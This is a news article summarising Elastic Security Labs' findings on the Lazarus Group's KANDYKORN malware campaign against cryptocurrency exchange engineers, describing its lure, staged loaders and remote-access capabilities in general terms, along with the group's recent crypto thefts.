The state-sponsored North Korean hacker group, Lazarus Group, has once again made headlines with their latest cyber attack on a cryptocurrency exchange. Using a sophisticated new type of malware called “Kandykorn,” they attempted to compromise the security of the exchange and gain unauthorized access to valuable cryptoassets.
Lazarus Group’s New Malware: Kandykorn
On October 31, Elastic Security Labs reported the discovery of Lazarus Group’s usage of a new malicious software (malware) called Kandykorn. This state-sponsored cyber activity, dating back to April 2023, exhibits similarities to previous attacks by Lazarus Group. Elastic Security Labs conducted an examination of their network infrastructure and methods employed, confirming the group’s involvement.
The hackers behind Lazarus Group posed as blockchain engineers and targeted other engineers from the unnamed cryptocurrency exchange on a public Discord server. They lured their targets by claiming to have developed a highly profitable arbitrage bot, capable of exploiting price differences between cryptocurrencies on various exchanges. To convince the engineers to download the malware, they disguised it as an arbitrage tool with file names like “config.py” and “pricetable.py.”
The Implant: KANDYKORN
Elastic Security Labs discovered the sophisticated implant known as KANDYKORN, which was designed by Lazarus Group to monitor, interact, and skillfully evade detection. The deployment of KANDYKORN involves a meticulously orchestrated five-stage process, showcasing its formidable capabilities.
The attack chain begins with the execution of a Python script named “watcher.py,” stored within a file labeled “Main.py.” This script establishes a connection to a remote Google Drive account, initiating the download of content into a file named “testSpeed.py.” After a single execution, “testSpeed.py” is promptly erased to eliminate any traces. During this brief execution, additional content is downloaded. TestSpeed.py acts as a dropper, fetching another Python file named “FinderTools” from a Google Drive URL. Serving as another dropper, FinderTools proceeds to download and execute a concealed second-stage payload known as SUGARLOADER.
SUGARLOADER employs a “binary packer” to hide itself, posing a challenge for most malware detection programs. However, Elastic Security Labs managed to identify it by halting the program’s post-initialization functions and scrutinizing the virtual memory. Once established, SUGARLOADER establishes a connection with a remote server, retrieving the final-stage payload, KANDYKORN. This payload is executed directly in memory.
In addition to KANDYKORN, SUGARLOADER launches a Swift-based self-signed binary named HLOADER, masquerading as the legitimate Discord application. It achieves persistence using a technique known as execution flow hijacking. KANDYKORN, the ultimate payload, is a formidable Remote Access Trojan (RAT) with an array of capabilities, including file enumeration, the execution of additional malware, data exfiltration, process termination, and the execution of arbitrary commands.
KANDYKORN grants the remote server an array of functions for potential malicious activities, including directory content listing and the seamless transfer of victim files to the attacker’s system. The discovery of this sophisticated implant highlights the evolving landscape of cyber threats and emphasizes the importance of robust security measures.
Lazarus Group and Crypto Exchange Hacks
Crypto exchanges have become prime targets for cybercriminals, and Lazarus Group is at the forefront of these attacks. They have been linked to numerous hacks, resulting in millions of dollars worth of stolen cryptoassets. The most notable incident was the attack on the sports betting platform Stake.com, where over $40 million was wiped out.
According to blockchain surveillance firm Elliptic, Lazarus Group has stolen nearly $240 million in cryptocurrencies since June. They targeted crypto exchanges such as Atomic Wallet, CoinsPaid, Alphapo, CoinEx, and Stake.com. The United States Federal Bureau of Investigation has accused Lazarus Group of being responsible for the Coinex hack, as well as the attack on Stake.com and others.
According to a report from the institutional crypto platform provider 21.co, wallets connected to Lazarus Group contain around 1,600 Bitcoin, 10,810 Ether, and 64,490 Binance Coins. These staggering numbers emphasize the need for heightened security measures within the cryptocurrency industry.